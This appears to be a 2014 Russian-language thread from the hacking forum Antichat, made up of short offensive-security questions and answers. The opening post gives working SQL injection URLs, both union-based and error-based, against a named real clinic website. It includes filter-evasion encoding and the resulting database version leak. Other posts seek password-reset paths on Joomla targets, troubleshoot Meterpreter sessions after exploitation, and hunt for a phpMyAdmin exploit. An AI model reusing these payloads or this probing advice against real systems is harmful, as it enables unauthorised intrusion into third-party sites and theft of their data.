ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.06.2014, 08:28
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от madhatter
madhatter said:
_http://profclinic.ru/search/?search_string=oops'&x=0&y=0
_http://profclinic.ru/search/?search_string=oopss%27%29%0AAND%0A5851=5851%0Auni on%0Aall%0Aselect%0A1,2,3,4,5,6,7,8,%0A%23&x=0&y=0
Пробелы на %0A корректно заменяются, с запятой сложнее. Начало параметра лучше рандомизировать, т.к. где-то на пути кеширование.
Error-based:
Код:
Code:
oops%27%29or%281%29group%09by%09mid%28%28SELECT%09version%28%29%29%09from%09rand%280%29%09for%099e9%29%09having%09min%280%29%23&x=0&y=0
Duplicate entry ' version' for key 'group_key
См. https://rdot.org/forum/showthread.php?t=245, последний пост с вектором без использования запятых.
|
|
|
13.06.2014, 15:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
XAMEHA, да, примерно так и работал. Спасибо за линк.
Возник вопрос по жумле. Если нигде на морде нет уютной кнопки "восстановить пароль", значит ли это, что в двиге фича рестора выключена? Если нет, какие у 1.5 ветки прямые линки на запрос восстановления и на ввод кода с почты?
|
|
|
|
13.06.2014, 15:24
|
|
Новичок
Регистрация: 04.12.2009
Сообщений: 1
Провел на форуме:
2424
Репутация:
0
|
|
А подскажите следующую вещь.
В armitage применяю эксплоит, всё успешно.
потом получаю доступ к файловой системе и cmd.
Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно.
Например ,вызываю удаленную консоль, набираю в ней
C:\Windows\system32> notepad.exe
Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками.
Такая же история с
meterpreter> execute -f notepad.exe
Процесс появляется, но визуально блокнот не запускается
|
|
|
|
13.06.2014, 15:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от ice99
ice99 said:
А подскажите следующую вещь.
В armitage применяю эксплоит, всё успешно.
потом получаю доступ к файловой системе и cmd.
Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно.
Например ,вызываю удаленную консоль, набираю в ней
C:\Windows\system32> notepad.exe
Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками.
Такая же история с
meterpreter> execute -f notepad.exe
Процесс появляется, но визуально блокнот не запускается
Видимо, у них давилка окон есть, чтобы случайно что-нибудь не вылезло. В winapi есть какие-то ключики для этого. Попробуйте либо почитать доки от msf, либо запилить notepad в батник.
|
|
|
|
13.06.2014, 15:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
343026
Репутация:
391
|
|
Сообщение от ice99
ice99 said:
А подскажите следующую вещь.
В armitage применяю эксплоит, всё успешно.
потом получаю доступ к файловой системе и cmd.
Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно.
Например ,вызываю удаленную консоль, набираю в ней
C:\Windows\system32> notepad.exe
Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками.
Такая же история с
meterpreter> execute -f notepad.exe
Процесс появляется, но визуально блокнот не запускается
а может быть там Windows 2008 консольная версия установлена?
|
|
|
|
13.06.2014, 15:51
|
|
Новичок
Регистрация: 04.12.2009
Сообщений: 1
Провел на форуме:
2424
Репутация:
0
|
|
Сообщение от madhatter
madhatter said:
Видимо, у них давилка окон есть, чтобы случайно что-нибудь не вылезло. В winapi есть какие-то ключики для этого. Попробуйте либо почитать доки от msf, либо запилить notepad в батник.
Да нет, система XP моя, поставил для опытов. Причем БЕЗ сервиспаков. Нулевая можно сказать. Ни антивируса, ни давилки, ничего осложняющего.
|
|
|
|
13.06.2014, 15:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от ice99
ice99 said:
Да нет, система XP моя, поставил для опытов. Причем БЕЗ сервиспаков. Нулевая можно сказать. Ни антивируса, ни давилки, ничего осложняющего.
Я имею в виду шеллы msf, которые делают exec без рендера окон.
|
|
|
|
13.06.2014, 16:21
|
|
Новичок
Регистрация: 04.12.2009
Сообщений: 1
Провел на форуме:
2424
Репутация:
0
|
|
Сообщение от madhatter
madhatter said:
либо запилить notepad в батник
запилил.
содержание файла
"start C:\Windows\System32\notepad.exe"
та же песня, блокнот запускается без gui
|
|
|
|
13.06.2014, 20:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
818
Репутация:
-2
|
|
Привет всем)
У меня такая проблема: есть phpMyAdmin 2.11.11.3
Версия достаточно старая, но никакого сплойта не могу найти, активное гуглование не помогает.
Подскажите знающие пожалуйста)
|
|
|
|
13.06.2014, 20:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от KSIVIT
KSIVIT said:
Привет всем)
У меня такая проблема: есть phpMyAdmin 2.11.11.3
Версия достаточно старая, но никакого сплойта не могу найти, активное гуглование не помогает.
Подскажите знающие пожалуйста)
Давайте повангую. Есть /scripts/setup.php, но не /config/. До кучи /phpmyadmin/ + /pma/ по всем соседям, но плоентов нет. И да, по эту версию так и не нашлось ничего стоящего.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
